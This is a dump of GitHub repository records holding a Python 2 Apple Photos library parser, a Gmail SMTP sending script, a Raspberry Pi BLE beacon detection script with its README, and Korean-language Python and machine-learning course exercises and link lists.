image_data:\n for key in image_data:\n image = IPhotoImage(key, image_data.get(key), self.keywords,\n self.face_names)\n self.images_by_id[key] = image\n\n album_data = self.data.get(\"List of Albums\")\n\n self.root_album = IPhotoContainer(\"\", \"Root\", None, None)\n for data in album_data:\n album = IPhotoAlbum(data, self.images_by_id, self.albums, self.root_album)\n self.albums[album.albumid] = album\n\n \"\"\"\n self.images_by_base_name = None\n self.images_by_file_name = None\n \"\"\"\n\n '''\n def _build_image_name_list(self):\n self.images_by_base_name = {}\n self.images_by_file_name = {}\n\n # build the basename map\n for image in self.images_by_id.values():\n base_name = image.getbasename()\n other_images = self.images_by_base_name.get(base_name)\n if other_images is None:\n other_images = []\n self.images_by_base_name[base_name] = other_images\n other_images.append(image)\n\n imagename = image.getimagename()\n other_image_list = self.images_by_file_name.get(imagename)\n if other_image_list is None:\n other_image_list = []\n self.images_by_file_name[imagename] = other_image_list\n other_image_list.append(image)\n '''\n\n def _getapplicationversion(self):\n return self.data.get(\"Application Version\")\n applicationVersion = property(_getapplicationversion, doc='Photos library version')\n\n def _getimages(self):\n return self.images_by_id.values()\n images = property(_getimages, doc=\"List of images\")\n\n '''\n def _getrolls(self):\n return self._rolls.values()\n rolls = property(_getrolls, \"List of rolls (events)\")\n\n def getroll(self, album_id):\n return self._rolls.get(album_id) \n\n def getbaseimages(self, base_name):\n \"\"\"returns an IPhotoImage list of all images with a matching base name.\n \"\"\"\n if not self.images_by_base_name:\n self._build_image_name_list()\n return self.images_by_base_name.get(base_name)\n\n def getnamedimage(self, file_name):\n \"\"\"returns an IPhotoImage for the given file name.\"\"\"\n if not self.images_by_file_name:\n self._build_image_name_list()\n image_list = self.images_by_file_name.get(file_name)\n if image_list:\n return image_list[0]\n return None\n\n def getallimages(self):\n \"\"\"returns map from full path name to image.\"\"\"\n image_map = {}\n for image in self.images_by_id.values():\n image_map[image.GetImagePath()] = image\n image_map[image.thumbpath] = image\n if image.originalpath is not None:\n image_map[image.originalpath] = image\n return image_map\n\n\n def check_photos(self):\n \"\"\"Attempts to verify that the data are not corrupt by checking the \"Photos\" album\n against the image list.\n \"\"\"\n photos = None\n for album in self.albums.values():\n if album.master:\n photos = album\n break\n if not photos:\n su.pout(\"No Photos album in library.\")\n return\n # Check size of Photos album vs. Master Image List\n if photos.size != len(self.images_by_id):\n su.pout(\"Warning: Master image list has %d images, but Photos album has %d images.\" % (\n len(self.images_by_id), photos.size))\n # Cross check Photos vs. Master Image List\n photos_ids = {}\n for photo in photos.images:\n photos_ids[photo.id] = photo # Make a map of Photos by id for the second phase below\n if not self.images_by_id.has_key(photo.id):\n su.pout(\"Warning: only in Photos album, but not in Master Image List: %s\" % (\n photo.caption))\n print photo\n for image in self.images:\n if not photos_ids.has_key(image.id):\n su.pout(\"Warning: only in Master Image List, but not in Photos album: %s\" % (\n image.caption))\n print image\n\n\n def check_inalbums(self):\n \"\"\"Checks that all images are in albums according to their events.\"\"\"\n messages = []\n for image in self.images_by_id.values():\n if image.IsHidden():\n continue\n roll_name = self._rolls[image.roll].name\n albums = []\n in_album = False\n\n for album in image.GetAlbums():\n album_name = album.name\n if album.GetAlbumType == \"Regular\":\n albums.append(album.name)\n in_album = True\n if album_name != roll_name:\n messages.append(image.caption + \": in wrong album (\" +\n roll_name + \" vs. \" + album_name + \").\")\n elif (album.isSmart() and album_name.endswith(\" Collection\") or\n album_name == \"People\" or album_name == \"Unorganized\"):\n in_album = True\n if not in_album:\n messages.append(image.caption + \": not in any album.\")\n if albums:\n messages.append(image.caption + \": in more than one album: \" +\n \" \".join(albums))\n messages.sort()\n for message in messages:\n print message\n\n def getfacealbums(self):\n \"\"\"Returns a map of albums for faces.\"\"\"\n if self.face_albums:\n return self.face_albums.values()\n\n # Build the albums on first call\n self.face_albums = {}\n\n for image in self.images:\n for face in image.getfaces():\n face_album = self.face_albums.get(face)\n if not face_album:\n face_album = IPhotoFace(face)\n self.face_albums[face] = face_album\n face_album.addimage(image)\n return self.face_albums.values()\n\n\n def print_summary(self):\n named_rolls = {}\n for roll in self._rolls.values():\n named_rolls[roll.name] = roll\n for roll in sorted(named_rolls.keys()):\n named_rolls[roll].print_summary()\n named_albums = {}\n for album in self.albums.values():\n named_albums[album.name] = album\n for album in sorted(named_albums):\n named_albums[album].print_summary()\n '''\n\n'''\n_CAPTION_PATTERN = re.compile(\n r'([12][0-9][0-9][0-9])([01][0-9])([0123][0-9]) (.*)')\n'''\n\nclass IPhotoImage(object):\n \"\"\"Describes an image in the Photos database.\"\"\"\n\n def __init__(self, key, data, keyword_map, face_map):\n '''\n self.id = key\n self.data = data\n '''\n self._caption = su.nn_string(data.get(\"Caption\")).strip()\n '''\n self.comment = su.nn_string(data.get(\"Comment\")).strip()\n '''\n\n self.date = None\n if \"ImageDate\" in data:\n self.date = data.get(\"ImageDate\")\n '''\n else:\n # Try to get the date from a the caption in \"YYYYMMDD ...\" format\n m = re.match(_CAPTION_PATTERN, self._caption)\n if m:\n year = int(m.group(1))\n month = int(m.group(2))\n if not month:\n month = 1\n date = int(m.group(3))\n if not date:\n date = 1\n self.date = datetime.datetime(year, month, date)\n else:\n self.date = None\n if data.has_key(\"ModDateAsTimerInterval\"):\n self.mod_date = applexml.getappletime(data.get(\"ModDateAsTimerInterval\"))\n else:\n if data.has_key(\"MetaModDateAsTimerInterval\"):\n self.mod_date = applexml.getappletime(data.get(\"MetaModDateAsTimerInterval\"))\n else:\n self.mod_Date = None\n '''\n\n self.image_path = data.get(\"ImagePath\")\n\n '''\n if data.has_key(\"Rating\"):\n self.rating = int(data.get(\"Rating\"))\n else:\n self.rating = None\n if data.get(\"longitude\"):\n latitude = float(data.get(\"latitude\"))\n longitude = float(data.get(\"longitude\"))\n self.gps = imageutils.GpsLocation(latitude, longitude)\n else:\n self.gps = None\n\n self.keywords = []\n keyword_list = data.get(\"Keywords\")\n if keyword_list is not None:\n for i in keyword_list:\n self.keywords.append(keyword_map.get(i))\n '''\n\n self.originalpath = data.get(\"OriginalPath\")\n\n '''\n self.roll = data.get(\"Roll\") \n\n self.albums = [] # list of albums that this image belongs to\n self.faces = []\n self.face_rectangles = []\n '''\n\n self.event_name = '' # name of event (roll) that this image belongs to\n self.event_index = '' # index within event\n self.event_index0 = '' # index with event, left padded with 0\n\n '''\n face_list = data.get(\"Faces\")\n if face_list:\n for face_entry in face_list:\n face_key = face_entry.get(\"face key\")\n face_name = face_map.get(face_key)\n if face_name:\n self.faces.append(face_name)\n # Rectangle is '{{x, y}, {width, height}}' as ratios,\n # referencing the lower left corner of the face rectangle,\n # with lower left corner of image as (0,0)\n rectangle = parse_face_rectangle(face_entry.get(\"rectangle\"))\n # Convert to using center of area, relative to upper left corner of image\n rectangle[0] += rectangle[2] / 2.0\n rectangle[1] = max(0.0, 1.0 - rectangle[1] - rectangle[3] / 2.0)\n self.face_rectangles.append(rectangle)\n # Other keys in face_entry: face index\n\n # Now sort the faces left to right.\n sorted_names = {}\n sorted_rectangles = {}\n for i in xrange(len(self.faces)):\n x = self.face_rectangles[i][0]\n while sorted_names.has_key(x):\n x += 0.00001\n sorted_names[x] = self.faces[i]\n sorted_rectangles[x] = self.face_rectangles[i]\n self.faces = [sorted_names[x] for x in sorted(sorted_names.keys())]\n self.face_rectangles = [\n sorted_rectangles[x] for x in sorted(sorted_rectangles.keys())]\n '''\n\n '''\n def getimagepath(self):\n \"\"\"Returns the full path to this image..\"\"\"\n return self.image_path\n '''\n\n def getimagename(self):\n \"\"\"Returns the file name of this image..\"\"\"\n name = os.path.split(self.image_path)[1]\n return name\n\n '''\n def getbasename(self):\n \"\"\"Returns the base name of the main image file.\"\"\"\n return su.getfilebasename(self.image_path)\n '''\n\n def _getcaption(self):\n if not self._caption:\n return self.getimagename()\n return self._caption\n caption = property(_getcaption, doc=\"Caption (title) of the image\")\n\n '''\n def ismovie(self):\n \"\"\"Tests if this image is a movie.\"\"\"\n return self.data.get(\"MediaType\") == \"Movie\"\n\n def addalbum(self, album):\n \"\"\"Adds an album to the list of albums for this image.\"\"\"\n self.albums.append(album)\n\n def addface(self, name):\n \"\"\"Adds a face (name) to the list of faces for this image.\"\"\"\n self.faces.append(name)\n\n def getfaces(self):\n \"\"\"Gets the list of face tags for this image.\"\"\"\n return self.faces\n\n def ishidden(self):\n \"\"\"Tests if the image is hidden (using keyword \"Hidden\")\"\"\"\n return \"Hidden\" in self.keywords\n\n def _getthumbpath(self):\n return self.data.get(\"ThumbPath\")\n thumbpath = property(_getthumbpath, doc=\"Path to thumbnail image\")\n\n def _search_for_file(self, folder_path, basename):\n \"\"\"Scans recursively through a folder tree and returns the path to the\n first file it finds that starts with \"basename\".\n \"\"\"\n for file_name in su.os_listdir_unicode(folder_path):\n path = os.path.join(folder_path, file_name)\n if os.path.isdir(path):\n path = self._search_for_file(path, basename)\n if path:\n return path\n elif file_name.startswith(basename):\n return path\n return None\n '''\n\n\nclass IPhotoContainer(object):\n \"\"\"Base class for IPhotoAlbum and IPhotoRoll.\"\"\"\n\n def __init__(self, name, albumtype, data, images):\n self.name = name\n\n '''\n self.uuid = None\n self.comment = None\n\n if data:\n if data.get(\"uuid\"):\n self.uuid = data.get(\"uuid\")\n if self.uuid == 'lastImportAlbum':\n albumtype = \"Special Roll\"\n if 'Comments' in data:\n self.comment = data.get(\"Comments\")\n '''\n\n # TODO Convert Photos numeric album types to type names.\n if not albumtype:\n su.pout(u'No album type for %s.' % name)\n self.albumtype = albumtype\n self.data = data\n\n '''\n self.albumid = -1\n '''\n\n self.images = []\n self.albums = []\n\n '''\n self.master = False\n '''\n\n hidden = 0\n if data and (\"KeyList\" in data):\n keylist = data.get(\"KeyList\")\n for key in keylist:\n if not key:\n continue\n image = images.get(key)\n if image:\n self.images.append(image)\n else:\n hidden += 1\n su.pout(u\"%s: image with id %s does not exist - could be hidden.\" % (name, key))\n \n if hidden:\n su.pout(u\"%s: %d images not exported (probably hidden).\" % (name, hidden))\n\n '''\n self._assign_names()\n '''\n\n '''\n def _assign_names(self):\n \"\"\"Assigns sequential index values to all images if this container is an Event.\"\"\"\n if self.albumtype != 'Event':\n return\n i = 1\n index_digits = len(str(len(self.images)))\n for image in self.images:\n image.event_name = self.name\n image.event_index = i\n image.event_index0 = str(i).zfill(index_digits)\n i += 1\n\n def merge(self, other_roll):\n for image in other_roll.images:\n self.images.append(image)\n self._assign_names()\n\n def _getsize(self):\n return len(self.images)\n size = property(_getsize, \"Gets the size (# of images) of this album.\")\n '''\n\n def getfolderhint(self):\n return self.data['FolderPath']\n\n '''\n def getcommentwithouthints(self):\n \"\"\"Gets the image comments, with any folder hint lines removed\"\"\"\n result = []\n if self.comment:\n for line in self.comment.split(\"\\n\"):\n if not line.startswith(\"@\"):\n result.append(line)\n return \"\\n\".join(result)\n '''\n\n def addalbum(self, album):\n \"\"\"adds an album to this container.\"\"\"\n self.albums.append(album)\n\n def _getdate(self):\n return self.data.get(\"AlbumDate\")\n date = property(_getdate, doc='date of container (based on oldest image)')\n\n '''\n def tostring(self):\n \"\"\"Gets a string that describes this album or event.\"\"\"\n return \"%s (%s)\" % (self.name, self.albumtype)\n\n def print_summary(self):\n if self.albumtype != \"Event\":\n return\n original_count = 0\n file_size = 0\n original_size = 0\n face_count = 0\n for image in self.images:\n face_count += len(image.getfaces())\n if image.originalpath:\n original_count += 1\n if os.path.exists(image.originalpath):\n original_size += os.path.getsize(image.originalpath)\n if os.path.exists(image.image_path):\n file_size += os.path.getsize(image.image_path)\n if not image.originalpath:\n original_size += os.path.getsize(image.image_path)\n file_size = file_size / 1024.0 / 1024.0\n original_size = original_size / 1024.0 / 1024.0\n su.pout(u\"%-50s %4d images (%6.1f MB), %3d originals (%6.1f MB), %3d faces\" % (\n self.tostring(), len(self.images), file_size, original_count, original_size,\n face_count))\n '''\n\n\nclass IPhotoAlbum(IPhotoContainer):\n \"\"\"Describes an Photos Album.\"\"\"\n\n def __init__(self, data, images, album_map, root_album):\n IPhotoContainer.__init__(self, data.get(\"AlbumName\"),\n data.get(\"Album Type\") if (\"Album Type\" in data) else \"Regular\",\n data, images)\n self.albumid = data.get(\"AlbumId\")\n\n # TODO NO SE QUE SIGNIFICA ESTA PROPIEDAD \"MASTER\"\n if data.has_key(\"Master\"):\n self.master = True\n\n self.parent = root_album\n self.parent.addalbum(self)\n\n\n'''\nclass IPhotoFace(object):\n \"\"\"An IPhotoContainer compatible class for a face.\"\"\"\n\n def __init__(self, face):\n self.name = face\n self.albumtype = \"Face\"\n self.albumid = -1\n self.images = []\n self.albums = []\n self.comment = \"\"\n self.date = datetime.datetime.now()\n\n def _getsize(self):\n return len(self.images)\n size = property(_getsize, \"Gets the size (# of images) of this album.\")\n\n def getfolderhint(self):\n \"\"\"Gets a suggested folder name from comments.\"\"\"\n return None\n\n def getcommentwithouthints(self):\n \"\"\"Gets the image comments, with any folder hint lines removed\"\"\"\n return \"\"\n\n def addimage(self, image):\n \"\"\"Adds an image to this container.\"\"\"\n self.images.append(image)\n # Set the face date based on the earlierst image.\n if image.date and image.date < self.date:\n self.date = image.date\n\n def tostring(self):\n \"\"\"Gets a string that describes this album or event.\"\"\"\n return \"%s (%s)\" % (self.name, self.albumtype)\n'''\n\ndef get_iphoto_data(photos_library_dir, verbose=False):\n \"\"\"reads the Photos database and converts it into an iPhotoData object.\"\"\"\n if verbose:\n print \"Reading %s database from %s...\" % ('Photos', photos_library_dir)\n\n photos_dict = applexml.read_apple_library(photos_library_dir)\n\n data = IPhotoData(photos_dict)\n\n if data.applicationVersion != 477:\n # Library version for El Capitan is 1021\n raise ValueError(\"Photos library version %s has not been tested and it's not supported\" % (\n data.applicationVersion))\n\n return data\n"
}
] | 4 |
PaneendraP/Python | https://github.com/PaneendraP/Python | 56d484f21fcbec9941e6b1a673a98cc07c980a15 | 9a3f5045fecd0a88033e17eb0fc0eb891e2675ef | 66283a9c12e971a1eebe9fc0829d249b4778911d | refs/heads/master | 2022-05-31T23:52:06.907395 | 2020-05-04T17:03:29 | 2020-05-04T17:03:29 | 261,244,175 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7171428799629211,
"alphanum_fraction": 0.7257142663002014,
"avg_line_length": 33,
"blob_id": "f7e5b77f58fa2e4bbd3074e0a9995b440c4bac1a",
"content_id": "6fdebde593bfd077c0337f58240da35ea564eed2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 350,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 10,
"path": "/Email_Sending.py",
"repo_name": "PaneendraP/Python",
"src_encoding": "UTF-8",
"text": "import smtplib as smtp\r\n\r\nserver=smtp.SMTP_SSL(\"smtp.gmail.com\",465)\r\nserver.login('sender_Email','sender_password') \r\nserver.sendmail(\"From\",\"To\",'Message here')\r\nserver.quit()\r\n\r\n# for gmail need to allow security...\r\n#Go to Google's Account Security Settings: www.google.com/settings/security\r\n#Access for less secure apps\". Set it to \"Allowed\".\r\n"
}
] | 1 |
danielbertolozi/py-beacon-detection | https://github.com/danielbertolozi/py-beacon-detection | 0e1050afb1ca9906a56503c6e5be7833bc3688f0 | 26f9583deb7aaa7a8cc43c680e7a909458d37f82 | f63665c0b7b770234e0fb3a30d0336b49b87536f | refs/heads/master | 2016-08-26T00:42:18.874511 | 2016-08-11T23:07:07 | 2016-08-11T23:07:07 | 65,505,161 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.674578845500946,
"alphanum_fraction": 0.6998468637466431,
"avg_line_length": 37.411766052246094,
"blob_id": "3034f3a5bb4a4c5ea375ae79c3b55fab46289507",
"content_id": "749b02f75170b95017a3cb1d5fbb3669de16c6c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1306,
"license_type": "no_license",
"max_line_length": 174,
"num_lines": 34,
"path": "/README.md",
"repo_name": "danielbertolozi/py-beacon-detection",
"src_encoding": "UTF-8",
"text": "# py-beacon-detection\nPython script made for detecting BLE iBeacon devices and sending data in JSON to a remote server. Understand this as \"using a Raspberry as a detector for BLE enabled beacons\"\n\n## How to\n\nRead the comments in the script file. The application itself is very simple:\n* Searches for nearby devices (only BLE enabled devices)\n* Group their info in an object (which will be converted into a JSON later)\n* Group more info on that same JSON (an unique identifier (hardcoded string) for the Raspberry and the timestamp)\n* Send JSON to backend for processing\n\nThis was made for indoors detection of beacons (in a scenario where there are more than one Raspberry Pi).\nThere is an option for filtering - in which only the selected devices will be sent to the server. It can be toggleable with variable ```use_filtering```.\n\nIn order to use this script, you *must* have Bluepy installed. For more information, [please refer to the BluePy Github page](https://github.com/IanHarvey/bluepy).\n\nSample JSON obtained with this script:\n```json\n{\n \"timestamp\": \"02-08-2016 01:43:05\", \n \"devices\": \n [\n {\n \"rssi\": -85, \n \"address\": \"23:93:fd:2e:a9:44\"\n }, \n {\n \"rssi\": -43, \n \"address\": \"83:56:ce:4d:e1:8a\"\n }\n ], \n \"raspId\": \"raspberry test\"\n}\n```\n"
},
{
"alpha_fraction": 0.7030975818634033,
"alphanum_fraction": 0.7083576917648315,
"avg_line_length": 31.913461685180664,
"blob_id": "504833317c71034f56475cebb7064278f933bd15",
"content_id": "cd93608f474626bc511a8ab78b8755a3e9e5e9ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3422,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 104,
"path": "/script.py",
"repo_name": "danielbertolozi/py-beacon-detection",
"src_encoding": "UTF-8",
"text": "#\n#\tScript for Beacon Detection\n#\n#\tThis script was made and tested for the Raspberry Pi 3 using Python 3.2, and tested using iBeacon certificated devices.\n#\tThis script depends on BluePy. For more information: https://github.com/IanHarvey/bluepy\n#\tIt will scan for BLE enabled devices, create a JSON structure and forward it via POST to a remote server.\n#\tIt will also send an identifier for the Raspberry and a timestamp from when the measurings were taken.\n#\tThis was created for detecting Beacon devices inside a closed environment, with multiple Raspberries.\n#\tThe script can be configured. See the options right below the imports, in \"Script Configuration\".\n#\tThere is a filtering mode, which filters the devices that will be inputed to the JSON (remember to set up the IDs in monitor_ids).\n#\tTo toggle between both modes, change variable \"use_filtering\" to your desires.\n#\tExample configuration for monitor_ids: [34:ce:d0:c4:82:90, da:bc:45:31:25:ef]\n#\n#\tThe JSON structure is the following:\n#\n#\t{\n#\t\t\"timestamp\": timestamp, \n#\t\t\"devices\": [\n#\t\t\t{\n#\t\t\t\t\"rssi\": int, \n#\t \t\t\t\"address\": string\n#\t \t\t}, \n#\n#\t \t\t{\n#\t \t\t\t\"rssi\": int, \n#\t \t\t\t\"address\": string\n#\t \t\t}\n#\t \t], \n#\t \t\"raspId\": string\n#\t}\n# \n#\n\nfrom bluepy.btle import Scanner, DefaultDelegate\nfrom time import gmtime, strftime\nimport requests\nimport json\n\n#########\n# Script Configuration\n#########\n\nrasp_id = 'testberry'\nbeacon_address_id = 'address'\nbeacon_rssi_id = 'rssi'\nble_scan_duration = 3\nreq_device_id = 'devices'\nreq_raspid_id = 'raspId'\nreq_timestamp_id = 'timestamp'\npost_destination = 'http://localhost'\nuse_filtering = False\nmonitor_ids = []\nno_devices_found = False # do not change this value\n\nclass ScanDelegate(DefaultDelegate):\n def __init__(self):\n DefaultDelegate.__init__(self)\n\nscanner = Scanner().withDelegate(ScanDelegate())\n\ndef create_device_object(devices):\n\t# This will return a list of objects (each object equals to a BLE device, and contains its rssi and address) in the following fashion:\n\t# [{\"rssi\": int, \"address\": string}, {\"rssi\": int, \"address\": string}]\n\tall_info = []\n\tfor dev in devices:\n\t\tbeacon_data = {}\n\t\tbeacon_data[beacon_address_id] = dev.addr\n\t\tbeacon_data[beacon_rssi_id] = dev.rssi\n\t\tall_info.append(beacon_data)\n\tif beacon_data is None:\n\t\tno_devices_found = True\n\treturn all_info\n\ndef create_device_object_filtering(devices, monitor_ids)\n\t# This function works in the same fashion as the one above, except it will only input the registered IDs to the JSON. Useful for monitoring a fixed number of devices\n\tall_info = []\n\tfor dev in devices:\n\t\t\tfor ids in monitor_ids:\n\t\t\t\tif dev.addr == ids:\n\t\t\t\t\tbeacon_data = {}\n\t\t\t\t\tbeacon_data[beacon_address_id] = dev.addr\n\t\t\t\t\tbeacon_data[beacon_rssi_id] = dev.rssi\n\t\t\t\t\tall_info.append(beacon_data)\n\tif beacon_data is None:\n\t\tno_devices_found = True\n\treturn all_info\n\ndef get_timestamp():\n\t# returns timestamp\n\treturn strftime(\"%d-%m-%Y %H:%M:%S\", gmtime())\n\nwhile True:\n\treq = {}\n\tdevs = [] # must be reinitialized at each loop\n\tdevices = scanner.scan(ble_scan_duration)\n\tif use_filtering:\n\t\tdevs.append(create_device_object_filtering(devices, monitor_ids))\n\telse:\n\t\tdevs.append(create_device_object(devices))\n\tif not no_devices_found:\n\t\treq[req_device_id], req[req_raspid_id], req[req_timestamp_id] = devs, rasp_id, get_timestamp()\n\tjson_data = json.dumps(req)\n\tpost = requests.post(post_destination, data=json_data)\n\tprint (post.status_code, post.reason)"
}
] | 2 |
digicope01/bigdata | https://github.com/digicope01/bigdata | 1dd3ec15a3c53b12297c97afabd4fce63ec57f39 | 5566b4bad80e9a57e604b5053e636b30543085eb | e94c4cae1e0bba666f778b449ad1f0d93be5964c | refs/heads/master | 2020-09-07T19:18:28.497258 | 2019-12-11T00:41:09 | 2019-12-11T00:41:09 | 220,889,133 | 1 | 4 | null | null | null | null | null | [
{
"alpha_fraction": 0.41532689332962036,
"alphanum_fraction": 0.4721328914165497,
"avg_line_length": 27.619047164916992,
"blob_id": "27f4ca2d3a00fc181f24f0c09b2b9afd0392598e",
"content_id": "1a7b8d630d0c3fa893666c9e12eb109f0babd7bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1898,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 63,
"path": "/파이썬프로그래밍/LIST실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# LIST실습문제.py\r\n# 1번 답안\r\nprint( '{0:=^50}'.format( '4' ) )\r\nop = [ '+', '-', '*', '/' ]\r\nnumber1 = input( 'Input number1 : ' )\r\nnumber2 = input( 'Input number2 : ' )\r\nop_select = int( input(\r\n 'Input operator( 1:+, 2:-, 3:*, 4:/ ) : ' ) )\r\n\r\nindex = op_select - 1\r\nresult = eval( number1 + op[ index ] + number2 )\r\n\r\nprint()\r\nprint( 'number1 : {0:^8.2}'.format( number1 ) )\r\nprint( 'number2 : {0:^8.2}'.format( number2 ) )\r\nprint( '{0:^6} {2:^3} {1:^6} = {3:<.2f}'.format(\r\n number1, number2, op[ index ], result ) )\r\n\r\n# 2번 답안\r\nprint( '{0:=^50}'.format( '5' ) )\r\nmax_number = int( input( 'Input max number : ' ) )\r\n\r\nl = list( range( 1, max_number + 1 ) )\r\n\r\nprint()\r\nprint( l )\r\nprint( '1 ~ {0:^6} = {1:<8}'.format(max_number, sum( l )))\r\n\r\n\r\n# 3번 답안\r\nprint( '{0:=^50}'.format( '6' ) )\r\nmax_number = int( input( 'Input max number : ' ) )\r\n\r\neven = list( range( 2, max_number + 1, 2 ) )\r\nodd = list( range( 1, max_number + 1, 2 ) )\r\n# even = [k for k in range( 2, max_number + 1)\r\n# if k % 2 == 0]\r\n# odd = [k for k in range( 2, max_number + 1)\r\n# if k % 2 != 0]\r\nprint()\r\nprint( 'even number : ', even )\r\nprint( '1 ~ {0:^6} = {1:<8}\\n'.format( max_number,\r\n sum( even ) ) )\r\n\r\nprint( 'odd number : ', odd )\r\nprint( '1 ~ {0:^6} = {1:<8}'.format( max_number,\r\n sum( odd ) ) )\r\n\r\n# 4번 답안\r\nprint( '{0:=^50}'.format( '7' ) )\r\nmax_number = int( input( 'Input max number : ' ) )\r\n\r\nl3 = [ x for x in range( 1, max_number + 1 ) if x % 3 == 0 ]\r\nl5 = [ x for x in range( 1, max_number + 1 ) if x % 5 == 0 ]\r\nl = [ x for x in range( 1, max_number + 1 ) if x % 3 != 0\r\n and x % 5 != 0 ]\r\n\r\nprint()\r\n\r\nprint( 'Multiple of 3 : ', l3, '\\n' )\r\nprint( 'Multiple of 5 : ', l5, '\\n' )\r\nprint( 'Excluding Multiple of 3 and 5 : ', l )\r\nprint( 'sum = {0:<6}'.format( sum( l ) ) )\r\n"
},
{
"alpha_fraction": 0.7749999761581421,
"alphanum_fraction": 0.7749999761581421,
"avg_line_length": 19,
"blob_id": "577f59ae536de6d12005fa77ef58226a4d636ec3",
"content_id": "8a12a166485f2908027bcde6855ae548e30b0fd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 2,
"path": "/파이썬프로그래밍/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "PyChram 다운로드\nhttps://www.jetbrains.com/\n"
},
{
"alpha_fraction": 0.4961685836315155,
"alphanum_fraction": 0.501915693283081,
"avg_line_length": 15.989130020141602,
"blob_id": "17163cfb9ff587eb0b834a8fc04506089e2a863f",
"content_id": "7b87fd0c1207b9c336b537f661626433c5e52dc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1846,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 92,
"path": "/파이썬머신러닝/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "\n\n\n교재: 파이썬 머신러닝 완벽가이드 - 권철민 지음, 위키북스\n\n\n예제코드 : https://github.com/wikibook/ml-definitive-guide/\n\n예제코드 : https://github.com/chulminkw/PerfectGuide\n\n동영상강의 : https://www.inflearn.com/course/파이썬-머신러닝-완벽가이드/news\n\n데이터 파일 : https://www.kaggle.com/c/titanic/data\n\n\n\n\n=============================================================\n\n타이타닉 생존자 예측 머신러닝 \n\nTitanic: Machine Learning from Disaster\nStart here! Predict survival on the Titanic and get familiar with ML basics\n\nhttps://www.kaggle.com/c/titanic/overview/tutorials\n\n\n\n=============================================================\n\n신용카드 사기 검출 데이터 세트 (144MB)\n\nhttps://www.kaggle.com/mlg-ulb/creditcardfraud\n\n\n=============================================================\n\n Tensorflow 머신러닝 동영상 강의\n \n 홍콩과기대 김성훈 교수 우리말 강의\n https://hunkim.github.io/ml/\n \n \n 스탠포드대 앤드류 응(Andrew Ng) 교수의 영어 강의\nhttps://class.coursera.org/ml-003/lecture\n\n\n=============================================================\n\n앙상블 학습 및 랜덤 포레스트 설명\n\nhttps://excelsior-cjh.tistory.com/166\n\n\n=============================================================\n\n#### fit() 과 transform() 결합사용\nfrom sklearn.base import TransformerMixin\n\nclass A(TransformerMixin):\n\n def fit(self,X):\n \n print('fit:',X)\n \n return self\n \n def transform(self,X):\n \n print('trans:',X)\n \n return X\n \n \ninst = A()\n\ninst.fit('x_data')\n\ninst.transform('y_data')\n\ninst.fit_transform('my_data') \n\n<출력>\n\nfit: x_data\n\ntrans: y_data\n\nfit: my_data\n\ntrans: my_data\n\n\n\n=======================================================\n"
},
{
"alpha_fraction": 0.47746968269348145,
"alphanum_fraction": 0.5411611795425415,
"avg_line_length": 14.560811042785645,
"blob_id": "6d3c87a944aa4d8723500a328a994f6dfe8fd7ac",
"content_id": "18aa84fd4628ea880a374be6ab1303d8cdaa1d9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3872,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 148,
"path": "/파이썬프로그래밍/파이썬기초실습.txt",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "-- 파이썬 프로그래밍 실습 과제 --\n\n\n[숫자형 실습문제]\n\n1. 속도와 거리를 입력받아 시간을 계산하여 \n 출력하는 프로그램\n \n 거리 / 속도\n\n2. 길이와 너비를 입력받아 면적과 둘레를 \n 계산하여 출력하는 프로그램\n \n 면적 = 길이 * 너비\n\t \n \t 둘레 = 길이 * 2 + 너비 * 2\n\n3. 화씨 온도를 입력받아 섭씨 온도로 변환하는 \n프로그램\n\n 섭씨 = ( 화씨 - 32 ) / 1.8\n\n4. 두 수를 입력받아 덧셈, 뺄셈, 곱셈, 몫, 나머지\n를 출력하는 프로그램을 작성하세요\n\n\t \n-\n-\n-\n\n[ 문자열 실습과제 ]\n1. s = 'hong gil dong201912121623210' 을 다음과 같이 출력하시오\n\t\n\t Name : hong gil dong\n\t Birthday : 2019/12/12\n\t ID Number : 20191212-1623210\n\t\n2. s = 'PythonProgramming' 내용을 문자열 슬라이싱과 문자열 \n 연결하기를 이용하여 'ProgrammingPython' 으로 변경하여 출력하시오.\n \n3. s = 'hello world'의 내용을 'hi world'로 변경하여 출력하시오.\n\n\t \n-\n-\n-\n\n\n[ list 실습과제 ]\n\n1. 리스트에 '+', '-', '*', '/'를 저장해 놓고 정수 2개를 입력 받고 계산 방식은\n 정수로 입력받아 해당 연산을 수행하는 프로그램을 작성하시오(eval()함수를 사용하세요)\n \n (계산방식은 1이면 '+', 2이면 '-', 3이면 '*', 4이면 '/')\n \n <힌트> op_select = int(input('Input operator( 1:+, 2:-, 3:*, 4:/ ) : '))\n\n2. 1 ~ n까지 합을 출력하는 프로그램을 리스트를 이용하여 작성하시오.\n (range(),sum()함수를 사용하세요, 최대값 n을 input()함수로 입력 받아 사용하세요)\n\t\n <힌트> >>>mylist = [0,1,2,3,4,5,6,7,8,9,10]\n >>>sum(mylist)\n 55\n\t\t \n3. 1 ~ n까지 짝수합과 홀수합을 출력하는 프로그램을 리스트를 이용하여 작성하시오.\n (최대값 n을 input()함수로 입력 받아 사용하세요)\n\n4. 1 ~ n까지 3의 배수와 5의 배수를 제외한 수를 출력하고 그 합을 출력하는 